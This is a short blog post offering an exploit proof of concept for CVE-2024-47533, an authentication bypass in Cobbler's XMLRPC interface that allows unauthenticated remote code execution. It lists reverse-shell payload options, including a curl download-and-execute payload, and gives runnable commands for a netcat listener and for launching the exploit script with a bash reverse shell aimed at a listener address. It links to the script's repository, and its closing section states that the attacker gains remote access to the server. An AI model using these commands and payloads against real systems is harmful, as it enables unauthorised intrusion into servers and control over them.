Connect

What are You Looking For?

dollarboysushil
onAugust 12, 2025

CVE-2024-47533 – Cobbler XMLRPC Authentication Bypass RCE Exploit POC

CVE-2024-47533 is a critical authentication bypass vulnerability in Cobbler (versions 3.0.0 to before 3.2.3 and 3.3.7) allowing unauthenticated remote code execution via the XMLRPC interface.
1 min read

💥 Example Payloads

The exploit script supports various reverse shell payloads including:

  • Bash reverse shell
  • Netcat shells (ncnc2)
  • Python reverse shell
  • Curl download & execute

🔬 Proof-of-Concept (PoC) Demonstration

Github Repo link

https://github.com/dollarboysushil/CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

📡 Preparing the Listener

Start a Netcat listener on your machine:

nc -lvnp 4444

🚀 Launching the Exploit

Run the exploit script CVE-2024-47533-dbs.py.

python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

📝 References

dollarboysushil
onAugust 12, 2025
7 views
Share
Previous Article

CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

Next Article

Privilege Escalation PoC: Terraform sudo Exploit

Write a Comment

Leave a Comment

Your email address will not be published. Required fields are marked *

Read Next